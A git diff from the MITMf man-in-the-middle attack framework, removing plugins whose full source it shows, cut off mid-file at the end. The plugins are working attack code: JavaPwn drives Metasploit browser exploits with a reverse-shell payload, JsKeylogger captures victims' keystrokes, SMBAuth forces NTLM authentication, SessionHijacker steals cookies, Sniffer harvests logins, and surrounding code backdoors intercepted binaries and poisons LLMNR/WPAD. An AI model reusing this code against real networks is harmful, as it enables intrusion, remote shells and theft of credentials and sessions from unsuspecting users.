self.zipMimeTypes: - - if self.bytes_have_format(data, 'zip'): - mitmf_logger.info("{} Detected supported zip file type!".format(client_ip)) - - process = multiprocessing.Process(name='zip', target=self.zip, args=(data,)) - process.daemon = True - process.start() - process.join() - bd_zip = self.patched.get() - - if bd_zip: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_zip} - - else: - for tartype in ['gz','bz','tar']: - if self.bytes_have_format(data, tartype): - mitmf_logger.info("{} Detected supported tar file type!".format(client_ip)) - - process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,)) - process.daemon = True - process.start() - process.join() - bd_tar = self.patched.get() - - if bd_tar: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_tar} - - - elif content_header in self.binaryMimeTypes: - for bintype in ['pe','elf','fatfile','machox64','machox86']: - if self.bytes_have_format(data, bintype): - mitmf_logger.info("{} Detected supported binary type!".format(client_ip)) - fd, tmpFile = mkstemp() - with open(tmpFile, 'w') as f: - f.write(data) - - process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) - process.daemon = True - process.start() - process.join() - patchb = self.patched.get() - - if patchb: - bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() - os.remove('./backdoored/' + os.path.basename(tmpFile)) - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_binary} - - else: - mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header)) - return {'request': request, 'data': data} \ No newline at end of file diff --git a/plugins/Inject.py b/plugins/Inject.py index 68cd277..a28375b 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -24,15 +24,10 @@ import re import sys import argparse -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import get_if_addr - from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.CacheKill import CacheKill -mitmf_logger = logging.getLogger('mitmf') - class Inject(CacheKill, Plugin): name = "Inject" optname = "inject" diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py deleted file mode 100644 index 15a292d..0000000 --- a/plugins/JavaPwn.py +++ /dev/null @@ -1,235 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import string -import random -import threading -import sys -import logging - -from core.msfrpc import Msfrpc -from plugins.plugin import Plugin -from plugins.BrowserProfiler import BrowserProfiler -from time import sleep - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import get_if_addr - -requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message -requests_log.setLevel(logging.WARNING) - -mitmf_logger = logging.getLogger('mitmf') - -class JavaPwn(BrowserProfiler, Plugin): - name = "JavaPwn" - optname = "javapwn" - desc = "Performs drive-by attacks on clients with out-of-date java browser plugins" - tree_output = [] - depends = ["Browserprofiler"] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.msfip = options.ip_address - self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit - - try: - msfcfg = options.configfile['MITMf']['Metasploit'] - except Exception, e: - sys.exit("[-] Error parsing Metasploit options in config file : " + str(e)) - - try: - self.javacfg = options.configfile['JavaPwn'] - except Exception, e: - sys.exit("[-] Error parsing config for JavaPwn: " + str(e)) - - self.msfport = msfcfg['msfport'] - self.rpcip = msfcfg['rpcip'] - self.rpcpass = msfcfg['rpcpass'] - - #Initialize the BrowserProfiler plugin - BrowserProfiler.initialize(self, options) - self.black_ips = [] - - try: - msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary - msf.login('msf', self.rpcpass) - version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v%s" % version) - except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") - - t = threading.Thread(name='pwn', target=self.pwn, args=(msf,)) - t.setDaemon(True) - t.start() #start the main thread - - def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning) - return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5)) - - def get_exploit(self, java_version): - exploits = [] - - client_vstring = java_version[:-len(java_version.split('.')[3])-1] - client_uversion = int(java_version.split('.')[3]) - - for ver in self.javacfg['Multi'].iteritems(): - if type(ver[1]) is list: - for list_vers in ver[1]: - - version_string = list_vers[:-len(list_vers.split('.')[3])-1] - update_version = int(list_vers.split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif (client_vstring == version_string): - if client_uversion <= update_version: - exploits.append(ver[0]) - else: - version_string = ver[1][:-len(ver[1].split('.')[3])-1] - update_version = int(ver[1].split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif client_vstring == version_string: - if client_uversion <= update_version: - exploits.append(ver[0]) - - return exploits - - - def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions - #inject iframe - mitmf_logger.info("%s >> now injecting iframe to trigger exploit" % client_ip) - self.html_payload = "" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects - - mitmf_logger.info('%s >> waiting for ze shellz, Please wait...' % client_ip) - - exit = False - i = 1 - while i <= 30: #wait max 60 seconds for a new shell - if exit: - break - shell = msfinstance.call('session.list') #poll metasploit every 2 seconds for new sessions - if len(shell) > 0: - for k, v in shell.iteritems(): - if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted - mitmf_logger.info("%s >> Got shell!" % client_ip) - self.sploited_ips.append(client_ip) #target successfuly exploited :) - self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped - exit = True - break - sleep(2) - i += 1 - - if exit is False: #We didn't get a shell :( - mitmf_logger.info("%s >> session not established after 30 seconds" % client_ip) - - self.html_payload = self.get_payload() # restart the BrowserProfiler plugin - - def send_command(self, cmd, msf, vic_ip): - try: - mitmf_logger.info("%s >> sending commands to metasploit" % vic_ip) - - #Create a virtual console - console_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [console_id, cmd]) - - mitmf_logger.info("%s >> commands sent succesfully" % vic_ip) - except Exception, e: - mitmf_logger.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e)) - - def pwn(self, msf): - while True: - if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled - - brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format - - if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited - - vic_ip = brwprofile['ip'] - - mitmf_logger.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version'])) - mitmf_logger.info("%s >> Choosing exploit based on version string" % vic_ip) - - exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg - - if exploits: - - if len(exploits) > 1: - mitmf_logger.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits))) - exploit = random.choice(exploits) - mitmf_logger.info("%s >> choosing %s" %(vic_ip, exploit)) - else: - mitmf_logger.info("%s >> client is vulnerable to %s!" % (vic_ip, exploits[0])) - exploit = exploits[0] - - #here we check to see if we already set up the exploit to avoid creating new jobs for no reason - jobs = msf.call('job.list') #get running jobs - if len(jobs) > 0: - for k, v in jobs.iteritems(): - info = msf.call('job.info', [k]) - if exploit in info['name']: - mitmf_logger.info('%s >> %s already started' % (vic_ip, exploit)) - url = info['uripath'] #get the url assigned to the exploit - self.injectWait(msf, url, vic_ip) - - else: #here we setup the exploit - rand_port = random.randint(1000, 65535) #generate a random port for the payload listener - rand_url = self.rand_url() - #generate the command string to send to the virtual console - #new line character very important as it simulates a user pressing enter - cmd = "use exploit/%s\n" % exploit - cmd += "set SRVPORT %s\n" % self.msfport - cmd += "set URIPATH %s\n" % rand_url - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform - cmd += "set LHOST %s\n" % self.msfip - cmd += "set LPORT %s\n" % rand_port - cmd += "exploit -j\n" - - mitmf_logger.debug("command string:\n%s" % cmd) - - self.send_command(cmd, msf, vic_ip) - - self.injectWait(msf, rand_url, vic_ip) - else: - #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert) - mitmf_logger.info("%s >> client is not vulnerable to any java exploit" % vic_ip) - mitmf_logger.info("%s >> falling back to the signed applet attack" % vic_ip) - - rand_url = self.rand_url() - rand_port = random.randint(1000, 65535) - - cmd = "use exploit/multi/browser/java_signed_applet\n" - cmd += "set SRVPORT %s\n" % self.msfport - cmd += "set URIPATH %s\n" % rand_url - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" - cmd += "set LHOST %s\n" % self.msfip - cmd += "set LPORT %s\n" % rand_port - cmd += "exploit -j\n" - - self.send_command(cmd, msf, vic_ip) - self.injectWait(msf, rand_url, vic_ip) - sleep(1) diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py deleted file mode 100644 index 8acfe96..0000000 --- a/plugins/JsKeylogger.py +++ /dev/null @@ -1,169 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -import logging - -mitmf_logger = logging.getLogger('mitmf') - -class jskeylogger(Inject, Plugin): - name = "Javascript Keylogger" - optname = "jskeylogger" - desc = "Injects a javascript keylogger into clients webpages" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" - has_opts = False - - def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.msf_keylogger() - - def sendPostData(self, request): - #Handle the plugin output - if 'keylog' in request.uri: - - raw_keys = request.postData.split("&&")[0] - keys = raw_keys.split(",") - del keys[0]; del(keys[len(keys)-1]) - - input_field = request.postData.split("&&")[1] - - nice = '' - for n in keys: - if n == '9': - nice += "" - elif n == '8': - nice = nice.replace(nice[-1:], "") - elif n == '13': - nice = '' - else: - try: - nice += n.decode('hex') - except: - mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n)) - - #try: - # input_field = input_field.decode('hex') - #except: - # mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field)) - - mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice)) - - def msf_keylogger(self): - #Stolen from the Metasploit module http_javascript_keylogger - - payload = """""" - - return payload \ No newline at end of file diff --git a/plugins/Replace.py b/plugins/Replace.py deleted file mode 100644 index f623736..0000000 --- a/plugins/Replace.py +++ /dev/null @@ -1,105 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -""" -Plugin by @rubenthijssen -""" - -import sys -import logging -import time -import re -from plugins.plugin import Plugin -from plugins.CacheKill import CacheKill - -mitmf_logger = logging.getLogger('mitmf') - -class Replace(CacheKill, Plugin): - name = "Replace" - optname = "replace" - desc = "Replace arbitrary content in HTML content" - implements = ["handleResponse", "handleHeader", "connectionMade"] - depends = ["CacheKill"] - version = "0.1" - has_opts = True - - def initialize(self, options): - self.options = options - - self.search_str = options.search_str - self.replace_str = options.replace_str - self.regex_file = options.regex_file - - if (self.search_str is None or self.search_str == "") and self.regex_file is None: - sys.exit("[-] Please provide a search string or a regex file") - - self.regexes = [] - if self.regex_file is not None: - for line in self.regex_file: - self.regexes.append(line.strip().split("\t")) - - if self.options.keep_cache: - self.implements.remove("handleHeader") - self.implements.remove("connectionMade") - - self.ctable = {} - self.dtable = {} - self.mime = "text/html" - - def handleResponse(self, request, data): - ip, hn, mime = self._get_req_info(request) - - if self._should_replace(ip, hn, mime): - - if self.search_str is not None and self.search_str != "": - data = data.replace(self.search_str, self.replace_str) - mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str)) - - # Did the user provide us with a regex file? - for regex in self.regexes: - try: - data = re.sub(regex[0], regex[1], data) - - mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) - except Exception: - logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) - - self.ctable[ip] = time.time() - self.dtable[ip+hn] = True - - return {'request': request, 'data': data} - - return - - def add_options(self, options): - options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)") - options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.") - options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: [tab][new-line]") - options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.") - - def _should_replace(self, ip, hn, mime): - return mime.find(self.mime) != -1 - - def _get_req_info(self, request): - ip = request.client.getClientIP() - hn = request.client.getRequestHostname() - mime = request.client.headers['Content-Type'] - - return (ip, hn, mime) diff --git a/plugins/Responder.py b/plugins/Responder.py index 81c0186..676553f 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -23,9 +23,10 @@ import os import threading from plugins.plugin import Plugin -from libs.responder.Responder import ResponderMITMf -from core.sslstrip.DnsCache import DnsCache from twisted.internet import reactor +from core.responder.wpad.WPADPoisoner import WPADPoisoner +from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner +from core.utils import SystemConfig class Responder(Plugin): name = "Responder" @@ -37,37 +38,32 @@ class Responder(Plugin): def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' - self.options = options + self.options = options self.interface = options.interface + self.ourip = SystemConfig.getIP(options.interface) try: - config = options.configfile['Responder'] + config = self.config['Responder'] except Exception, e: sys.exit('[-] Error parsing config for Responder: ' + str(e)) - if options.Analyze: + LLMNRPoisoner().start(options, self.ourip) + + if options.wpad: + WPADPoisoner().start() + + if options.analyze: self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") - resp = ResponderMITMf() - resp.setCoreVars(options, config) - - result = resp.AnalyzeICMPRedirect() - if result: - for line in result: - self.tree_output.append(line) - - resp.printDebugInfo() - resp.start() - - def plugin_reactor(self, strippingFactory): + def pluginReactor(self, strippingFactory): reactor.listenTCP(3141, strippingFactory) def add_options(self, options): - options.add_argument('--analyze', dest="Analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") - options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") - options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") - options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False") - options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") - options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") + options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") + options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") + options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") + options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") + options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") + options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False") + options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") + options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py deleted file mode 100644 index a1df8fe..0000000 --- a/plugins/SMBAuth.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -import sys -import logging - -class SMBAuth(Inject, Plugin): - name = "SMBAuth" - optname = "smbauth" - desc = "Evoke SMB challenge-response auth attempts" - depends = ["Inject"] - version = "0.1" - has_opts = True - - def initialize(self, options): - Inject.initialize(self, options) - self.target_ip = options.host - - if not self.target_ip: - self.target_ip = options.ip_address - - self.html_payload = self._get_data() - - def add_options(self, options): - options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]") - - def _get_data(self): - return ''\ - ''\ - '' % tuple([self.target_ip]*3) diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py deleted file mode 100644 index 282b909..0000000 --- a/plugins/SSLstrip+.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import sys -import logging - -from plugins.plugin import Plugin -from core.utils import IpTables -from core.sslstrip.URLMonitor import URLMonitor -from core.dnschef.dnschef import DNSChef - -class HSTSbypass(Plugin): - name = 'SSLstrip+' - optname = 'hsts' - desc = 'Enables SSLstrip+ for partial HSTS bypass' - version = "0.4" - tree_output = ["SSLstrip+ by Leonardo Nve running"] - has_opts = False - - def initialize(self, options): - self.options = options - self.manualiptables = options.manualiptables - - try: - hstsconfig = options.configfile['SSLstrip+'] - except Exception, e: - sys.exit("[-] Error parsing config for SSLstrip+: " + str(e)) - - if not options.manualiptables: - if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, options.configfile['MITMf']['DNS']['port']) - - URLMonitor.getInstance().setHstsBypass(hstsconfig) - DNSChef.getInstance().setHstsBypass(hstsconfig) - - def finish(self): - if not self.manualiptables: - if IpTables.getInstance().dns is True: - IpTables.getInstance().Flush() \ No newline at end of file diff --git a/plugins/SessionHijacker.py b/plugins/SessionHijacker.py deleted file mode 100644 index ff9a3ec..0000000 --- a/plugins/SessionHijacker.py +++ /dev/null @@ -1,187 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb - -from plugins.plugin import Plugin -from core.publicsuffix.publicsuffix import PublicSuffixList -from urlparse import urlparse -import threading -import os -import sys -import time -import logging -import sqlite3 -import json -import socket - -mitmf_logger = logging.getLogger('mitmf') - -class SessionHijacker(Plugin): - name = "Session Hijacker" - optname = "hijack" - desc = "Performs session hijacking attacks against clients" - implements = ["cleanHeaders"] #["handleHeader"] - version = "0.1" - has_opts = True - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.psl = PublicSuffixList() - self.firefox = options.firefox - self.mallory = options.mallory - self.save_dir = "./logs" - self.seen_hosts = {} - self.sql_conns = {} - self.sessions = [] - self.html_header="

Cookies sniffed for the following domains\n
\n
" - - #Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires - #SQLite version 3.7.0 or later. You won't be able to read the database files - #with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted - #or is not a database" message. - - sqlv = sqlite3.sqlite_version.split('.') - if (sqlv[0] <3 or sqlv[1] < 7): - sys.exit("[-] sqlite3 version 3.7 or greater required") - - if not os.path.exists("./logs"): - os.makedirs("./logs") - - if self.mallory: - t = threading.Thread(name='mallory_server', target=self.mallory_server, args=()) - t.setDaemon(True) - t.start() - - def cleanHeaders(self, request): # Client => Server - headers = request.getAllHeaders().copy() - client_ip = request.getClientIP() - - if 'cookie' in headers: - - if self.firefox: - url = "http://" + headers['host'] + request.getPathFromUri() - for cookie in headers['cookie'].split(';'): - eq = cookie.find("=") - cname = str(cookie)[0:eq].strip() - cvalue = str(cookie)[eq+1:].strip() - self.firefoxdb(headers['host'], cname, cvalue, url, client_ip) - - mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip) - - if self.mallory: - if len(self.sessions) > 0: - temp = [] - for session in self.sessions: - temp.append(session[0]) - if headers['host'] not in temp: - self.sessions.append((headers['host'], headers['cookie'])) - mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) - mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) - else: - self.sessions.append((headers['host'], headers['cookie'])) - mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) - mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) - - #def handleHeader(self, request, key, value): # Server => Client - # if 'set-cookie' in request.client.headers: - # cookie = request.client.headers['set-cookie'] - # #host = request.client.headers['host'] #wtf???? - # message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie) - # if self.urlMonitor.isClientLogging() is True: - # self.urlMonitor.writeClientLog(request.client, request.client.headers, message) - # else: - # mitmf_logger.info(message) - - def mallory_server(self): - host = '' - port = 20666 - server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - server.bind((host,port)) - server.listen(1) - while True: - client, addr = server.accept() - if addr[0] != "127.0.0.1": - client.send("Hacked By China!") - client.close() - continue - request = client.recv(8192) - request = request.split('\n') - path = request[0].split()[1] - client.send("HTTP/1.0 200 OK\r\n") - client.send("Content-Type: text/html\r\n\r\n") - if path == "/": - client.send(json.dumps(self.sessions)) - client.close() - - def firefoxdb(self, host, cookie_name, cookie_value, url, ip): - - session_dir=self.save_dir + "/" + ip - cookie_file=session_dir +'/cookies.sqlite' - cookie_file_exists = os.path.exists(cookie_file) - - if (ip not in (self.sql_conns and os.listdir("./logs"))): - - try: - if not os.path.exists(session_dir): - os.makedirs(session_dir) - - db = sqlite3.connect(cookie_file, isolation_level=None) - self.sql_conns[ip] = db.cursor() - - if not cookie_file_exists: - self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))") - self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)") - except Exception, e: - print str(e) - - scheme = urlparse(url).scheme - scheme = (urlparse(url).scheme) - basedomain = self.psl.get_public_suffix(host) - address = urlparse(url).hostname - short_url = scheme + "://"+ address - - log = open(session_dir + '/visited.html','a') - if (ip not in self.seen_hosts): - self.seen_hosts[ip] = {} - log.write(self.html_header) - - if (address not in self.seen_hosts[ip]): - self.seen_hosts[ip][address] = 1 - log.write("\n
\n%s" %(short_url, address)) - - log.close() - - if address == basedomain: - address = "." + address - - expire_date = 2000000000 #Year2033 - now = int(time.time()) - 600 - self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0)) - - def add_options(self, options): - options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies') - options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension') - - def finish(self): - if self.firefox: - print "\n[*] To load a session run: 'firefox -profile logs//visited.html'" \ No newline at end of file diff --git a/plugins/Sniffer.py b/plugins/Sniffer.py deleted file mode 100644 index ca0ba51..0000000 --- a/plugins/Sniffer.py +++ /dev/null @@ -1,815 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -#This is a MITMf port of net-creds https://github.com/DanMcInerney/net-creds - -from plugins.plugin import Plugin -import logging -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) -from scapy.all import * -from sys import exit -from collections import OrderedDict -from StringIO import StringIO -import binascii -import struct -import pcap -import base64 -import threading -import re -import os - -mitmf_logger = logging.getLogger('mitmf') - -class Sniffer(Plugin): - name = "Sniffer" - optname = "sniffer" - desc = "Sniffs for various protocol login and auth attempts" - tree_output = ["Net-Creds online"] - implements = ["sendRequest"] - version = "0.1" - has_opts = False - - def initialize(self, options): - self.options = options - self.interface = options.interface - #self.parse = options.parse - - #these field names were stolen from the etter.fields file (Ettercap Project) - self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name', - 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', - 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', - 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', - 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] - - self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 